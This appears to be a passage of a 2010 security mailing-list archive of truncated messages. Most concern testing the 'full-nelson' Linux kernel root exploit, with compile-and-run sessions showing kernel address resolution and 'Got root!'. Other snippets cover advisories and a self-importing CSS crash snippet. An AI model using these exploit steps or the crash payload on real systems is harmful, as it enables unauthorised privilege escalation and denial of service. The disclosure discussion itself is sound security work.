it's worked on 2.6.35.7, nice exploit
On Wed, Dec 8, 2010 at 6:09 AM, Rem7ter rem7...@gmail.com wrote:
Why gcc exp.c -o exp alert Error: too many Argument? I test it in Linux
2.6.X.
2010/12/7 coderman coder...@gmail.com
On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
interesting analysis of 'this thing called Protected Mode '
On Tue, Dec 07, 2010 at 02:51:08PM -0600, Marsh Ray wrote:
On 12/07/2010 07:12 AM, valdis.kletni...@vt.edu wrote:
On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said:
2. some interpret it as a feature and some as a bug?
Does it
Hi list,
Is anyone familiar with the firefox addon KeyScrambler? According to developers
this encrypts keystrokes.
Quote:
How KeyScrambler Works:
When you type on your keyboard, the keys travel along a path within the
operating system before it
Won't work against a hardware keylogger, as it gets the strokes before the
driver does.
Won't work against any software aware of it; thread inject into Firefox to get
the real keystrokes and it's game over. Or heck, simply pretend to be a
firefox process to get the decryption key, assuming
On 08/12/2010 11:36, Dan Kaminsky wrote:
Won't work against a hardware keylogger, as it gets the strokes before the
driver does.
I guessed that, although on occasions I do miss the obvious.
Won't work against any software aware of it; thread
Hi
This seems to contradict itself somewhat. A plugin to firefox should
have no way to encrypt things at a driver level within the kernel, that
would require installing separate software at the root level, a plugin
should not be able to do this and I
Hi list,
Is anyone familiar with the firefox addon KeyScrambler? According to
developers this encrypts keystrokes.
What if the attacker uses a firefox plugin such as ffsnif[1] to get user's
credential ?
As Dan said, I guess this plugin will
Doesn't work here on Ubuntu 10.10 (VirtualBox) clean install (but with
all updates) with only an “apt-get install build-essential”
k...@kuri-virtualbox:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.10
DISTRIB_CODENAME=maverick
DISTRIB_DESCRIPTION=Ubuntu 10.10
PR10-05: XSS injection vulnerability within HP System Management Homepage
(Formally Insight Manager)
Vulnerability found: 8th February 2010
Vendor informed: 9th February 2010
Vulnerability fixed: 6th August 2010
Severity: Medium
Description:
An XSS vulnerability has been found within HP system
Anyone tested this in sandbox yet?
00:37 linups:../expl/kernel cat /etc/*release*
openSUSE 11.3 (i586)
VERSION = 11.3
00:37 linups:../expl/kernel uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel gcc _2.6.37.local.c -o test
00:37 linups:../expl/kernel ./test
[*] Failed to open file
Failed on Ubuntu 10.10 (2.6.35-23-generic)
t...@bifrost:/tmp$ uname -a
Linux bifrost 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC
2010 x86_64 GNU/Linux
t...@bifrost:/tmp$ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xa03d9610
[+] Resolved
<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>
code of css.css
*{
color:red;
}
@import url(css.css);
@import url(css.css);
@import url(css.css);
@import url(css.css);
/code
http://www.wooyun.org/bugs/wooyun-2010-0885
WooYun
Software: RomPager/4.07 UPnP/1.0
Issue: A reboot can be caused when a specially crafted HTTP request is sent.
Other Details: This version of RomPager is seen on a number of
residential routers that are shipped by a number of different ISPs.
The router I personally know it affects is the D-Link
If you've applied all your Ubuntu updates, the exploit is not going to
work. I decided to take a more responsible approach to exploit
publishing with this release. Rather than publish a fully weaponized
exploit that could be used by script kiddies everywhere to compromise
innocent users'
On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote:
Anyone tested this in sandbox yet?
00:37 linups:../expl/kernel cat /etc/*release*
openSUSE 11.3 (i586)
VERSION = 11.3
00:37 linups:../expl/kernel uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel gcc _2.6.37.local.c -o
It works for me with the default install on Ubuntu 10.10 kernel
2.6.35-22-generic once you run the updates it changes to 2.6.35-23 and then it
fails.
Infolookup
http://infolookup.securegossip.com
www.twitter.com/infolookup
-Original Message-
From: Guillaume Friloux
I ran it and my computer turned into a mudkip. I took a picture which
I have uploaded at [0]
I didn't read the instructions was I supposed to?
[0] -
http://www.aspectofthehare.net/wp-content/uploads/2009/07/MudkipComputerGame.png
==
Secunia Research 08/12/2010
- QuickTime Track Dimensions Buffer Overflow Vulnerability -
==
Table of Contents
Affected
I've included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what's going
on. Without further ado, I present full-nelson.c:
Hello Dan, is this exploitation not mitigated by best practice
defense-in-depth strategies such as
Debian lenny:
nik...@sandbox:~$ uname -a
Linux sandbox 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010
x86_64 GNU/Linux
nik...@sandbox:~$ make full-nelson
cc full-nelson.c -o full-nelson
nik...@sandbox:~$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved
Works in kernel 2.6.32-24
Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19
01:38:40 UTC 2010 x86_64 GNU/Linux
ind...@indzin-desktop:~$ ./nels
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xa0239510
[+] Resolved econet_ops to 0xa0239600
[+]
working here as well
ownst...@local[~]$ uname -a
FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18
UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64
ownst...@local[~]$ ./w00tw00t
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to
Google has acknowledged information about fixed versions of Website Optimizer
control scripts.
A potential XSS was reported by unnamed person.
More details at
http://websiteoptimizer.blogspot.com/2010/12/update-your-website-optimizer-scripts.html
including link to Help Center page with update
:~$ gcc nel.c
:~$ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf9c47280
[+] Resolved econet_ops to 0xf9c47360
[+] Resolved commit_creds to 0xc01625a0
[+] Resolved prepare_kernel_cred to 0xc01627a0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
#
Failed on Ubuntu 10.10
uname -a;
Linux admin-desktop 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC
2010 i686 GNU/Linux
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xe0858340
[+] Resolved econet_ops to 0xe0858440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved
On Tue, Dec 7, 2010 at 1:21 PM, Ryan Sears rdse...@mtu.edu wrote:
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel
2.6.35-22-generic). Works as expected.
Great job Dan. You're full of win!
Except that he needs to clean up his code - no one uses go to anymore.
Worked on Ubuntu 10.10 .. awesome work :)
On Thu, Dec 9, 2010 at 11:15 AM, Ed Carp e...@pobox.com wrote:
On Tue, Dec 7, 2010 at 1:21 PM, Ryan Sears rdse...@mtu.edu wrote:
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel
2.6.35-22-generic). Works as expected.
Great